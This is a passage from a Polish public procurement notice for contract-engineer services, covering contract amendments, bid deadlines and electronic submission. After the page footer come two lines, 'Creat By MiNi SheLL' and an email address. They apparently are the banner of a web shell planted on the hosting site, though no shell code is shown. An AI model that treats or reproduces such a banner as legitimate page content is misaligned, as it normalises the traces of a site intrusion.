określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy, w przypadku:<br/>a)	Zmiany danych Inżyniera Kontraktu (np. zmiana siedziby, nazwy itp.) lub zmiany wynikającej z przekształcenia podmiotowego po stronie Inżyniera Kontraktu. <br/>b)	zmiany osób pełniących funkcję inspektorów branżowych – zmiana będzie możliwa na wniosek Inżyniera Kontraktu, uzasadniony obiektywnymi okolicznościami, po przedstawieniu i zaakceptowaniu przez Zamawiającego kandydatury innej osoby spełniającej warunki zawarte w warunkach zamówienia oraz przedłożeniu dokumentów potwierdzających uprawnienia tych osób wraz z aktualnymi zaświadczeniami o przynależności do właściwej izby samorządu zawodowego;<br/>2.	Zamawiający przewiduje możliwość zmiany terminu realizacji zawartej umowy w przypadku:<br/>a)	wstrzymania robót przez Zamawiającego lub rezygnację przez Zamawiającego z realizacji części przedmiotu umowy,<br/>b)	konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub + specyfikacji technicznej wykonania i odbioru robót,<br/>c)	wystąpienie opóźnień w dokonaniu określonych czynności lub ich zaniechania przez właściwe odpowiedzialność;<br/>d)	wystąpienie opóźnień w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz sytuacje te nie są następstwem okoliczności, za które Inżynier Kontraktu ponosi odpowiedzialność<br/>3.	Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia należnego Inżynierowi Kontraktu w stosunku do treści oferty w przypadku wystąpienia któregokolwiek z następujących przypadków:<br/>1)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy dotyczących zmian stawki podatku VAT. <br/>2)	zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 5 ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę pod warunkiem, że zmiana ta skutkować będzie zwiększeniem kosztów po stronie Inżyniera Kontraktu związanych z realizacją Umowy z uwagi na zwiększenie wynagrodzeń pracowników, którzy otrzymują wynagrodzenie w wysokości minimalnego wynagrodzenia za pracę lub jego odpowiednią część (w przypadku pracowników zatrudnionych w wymiarze niższym niż pełen etat), bezpośrednio biorących udział w realizacji Umowy. <br/>3)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości składki na ubezpieczenie społeczne lub zdrowotne, pod warunkiem wykazania przez Inżyniera kontraktu rzeczywistego wpływu zmian zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne na zwiększenie kosztów związanych z realizacja przedmiotu umowy. <br/>4)	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z 4 października 2018r. o pracowniczych planach kapitałowych, z zastrzeżeniem, że dotyczy to wyłącznie zmiany zasad wprowadzonych na szczeblu ustawowym. Niniejsza przesłanka nie będzie miała zastosowania do zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych poczynionych na szczeblu Wykonawca (pracodawca) – pracownik. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Wykonawca składa ofertę za pośrednictwem Formularza do złożenia oferty, zmiany lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika systemu dostępnej na https://miniportal.uzp.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-25 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji, Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi jawną część należy ten plik zaszyfrować. Zastrzeżenie przez Wykonawcę tajemnicy przedsiębiorstwa bez uzasadnienia, będzie traktowane przez Zamawiającego jako bezskuteczne ze względu na zaniechanie przez Wykonawcę podjęcia niezbędnych działań w celu zachowania poufności objętych klauzulą informacji zgodnie z postanowieniami art. 18 ust. 3 ustawy Pzp.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-16 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com